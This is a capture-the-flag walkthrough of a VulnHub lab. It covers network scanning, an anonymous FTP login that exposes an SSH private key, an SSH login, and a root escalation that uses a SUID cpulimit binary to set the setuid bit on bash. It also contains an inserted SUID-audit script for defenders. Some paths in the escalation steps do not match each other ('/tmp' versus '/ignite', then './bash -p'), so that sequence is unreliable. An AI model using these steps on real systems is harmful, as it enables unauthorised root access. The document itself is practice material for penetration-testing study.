Today we will solve a new boot2root challenge named "ONSYSTEM: SHELLDREDD # 1 HANNAH". It is available on VulnHub for penetration testing practice, and we can download it from here. The credit goes to d4t4s3c for creating this lab. Let's start and learn how to break it down successfully.
Level: Easy
Penetration Testing Methodology
- Network Scanning
  - netdiscover
  - nmap
- Enumeration
  - ftp login
- Exploiting
  - SSH
- Post Exploitation
  - Enumeration for Sudo Permission
  - Enumeration for SUID
- Privilege Escalation
  - SUID permission on cpulimit
Now let’s start this walkthrough.
Network Scanning
Using netdiscover, we start by scanning our network for the target computer to find the IP address of the target machine. We need to match the MAC address of the target machine with the IP addresses shown by the netdiscover command. The target machine was active on 192.168.0.121.
netdiscover
Let's do a port and service scan. We will be using the nmap tool to see which ports are open. As seen in the screenshot below, the FTP (21) and SSH (61000) services are available.
nmap -p- -A 192.168.0.121
Enumeration
It was quite clear from the nmap scan that the FTP service has anonymous login enabled. So, let’s log in as Anonymous to enumerate the service further.
ftp 192.168.0.121
Anonymous
We listed the contents of the directory using the ls command, but it showed nothing useful. Then it occurred to us that the directories might be hidden, so it was time to use the -la option of the ls command to list all files in the current working directory, hidden ones included. This revealed a hidden directory called .hannah, inside which we found an SSH key.
ls
ls -la
cd .hannah
ls -la
We use the get command to transfer this key to our local system, i.e., Kali Linux.
get id_rsa
Exploiting
Now that we have downloaded the SSH key from the FTP server, it will likely have improper permissions. The SSH client requires a private key to be readable and writable only by its owner, so we need to set the permission to 600. After setting the appropriate permission, it’s time to log in using the SSH key. If we remember correctly from the nmap scan, the SSH service is running on port 61000.
chmod 600 id_rsa
ssh -i id_rsa hannah@192.168.0.121 -p 61000
We get access as the hannah user.
Post Exploitation
Now that we have a session on the target machine, it’s time to enumerate. We list all the files in the home directory and find a file named user.txt. This might be the user flag.
ls
cat user.txt
Now that the user flag is found, it’s time to elevate privileges and look for the binaries that can be run with sudo.
sudo -l
Much to our dismay, there isn’t any binary or script that can be run with sudo.
Next on our docket is SUID permissions. We can enumerate all binaries with the SUID bit set with the help of the find command, as shown in the image below (the original post had a typo, -u=5, in the permission test; the correct symbolic form is -u=s).
find / -perm -u=s -type f 2>/dev/null
We find that there is a binary called cpulimit that has the SUID permission. Time to exploit it.
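From the defender's side, the same find test becomes an audit: list every setuid file under a path and flag any that is not in a known baseline, so a stray setuid cpulimit stands out in a cron job or a hardening check. This is an added example, not code from the original walkthrough; the baseline entries and the throwaway fixture tree it builds are constructed for illustration.

```sh
#!/bin/sh
# Added example, not from the original walkthrough: audit setuid files under
# a path against a known baseline so an unexpected one (such as cpulimit on
# this box) stands out. Baseline entries and the fixture are constructed.

# list_suid DIR...: regular files with the setuid bit set, sorted one per line.
# -perm -4000 is the octal form of the -u=s test used in the walkthrough.
list_suid() {
    find "$@" -xdev -type f -perm -4000 2>/dev/null | sort
}

# unexpected_suid BASELINE_FILE DIR...: setuid files not listed (exactly, one
# path per line) in BASELINE_FILE. Prints nothing when everything is expected.
unexpected_suid() {
    baseline="$1"
    shift
    list_suid "$@" | grep -vxF -f "$baseline" || true
}

# make_fixture: build a throwaway tree that mimics the box: passwd and sudo
# are expected setuid binaries, cpulimit is the surprise, ls is a normal file.
# Prints the fixture directory; the caller removes it afterwards.
make_fixture() {
    d=$(mktemp -d)
    mkdir -p "$d/usr/bin"
    for f in passwd sudo cpulimit; do
        : > "$d/usr/bin/$f"
        chmod u+s "$d/usr/bin/$f"   # an owner may set setuid on its own file
    done
    : > "$d/usr/bin/ls"
    printf '%s\n' "$d/usr/bin/passwd" "$d/usr/bin/sudo" > "$d/baseline.txt"
    printf '%s\n' "$d"
}

# Stand-alone run: audit the fixture and report the unexpected entry.
# On a real host you would run: unexpected_suid /etc/suid-baseline.txt /
demo() {
    fx=$(make_fixture)
    echo "Unexpected setuid files:"
    unexpected_suid "$fx/baseline.txt" "$fx"
    rm -rf "$fx"
}
demo
```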
Privilege Escalation
We can use cpulimit to run commands that we otherwise lack the permissions for, such as mkdir and cp, but first we need to move into the /tmp directory, as it is the only directory we have write permission in. Next, we change the permissions on the bash binary and copy it into the directory we created, i.e., ignite. Then we set the setuid bit on the bash copy inside the ignite directory.
cd /tmp
cpulimit -l 100 -f mkdir /ignite
cpulimit -l 100 -f chmod 4755 /usr/bin/bash
cpulimit -l 100 -f cp /usr/bin/bash /ignite
cpulimit -l 100 -f chmod +s /ignite/bash
./bash -p
Then BOOM!! We got root. We can check its id, and in the root directory we find root.txt. After reading this file, Hurray!! we got our root flag.
cd /root
ls
cat root.txt
Author: Shubham Sharma is a Pentester and Cybersecurity Researcher. Contact: LinkedIn and Twitter.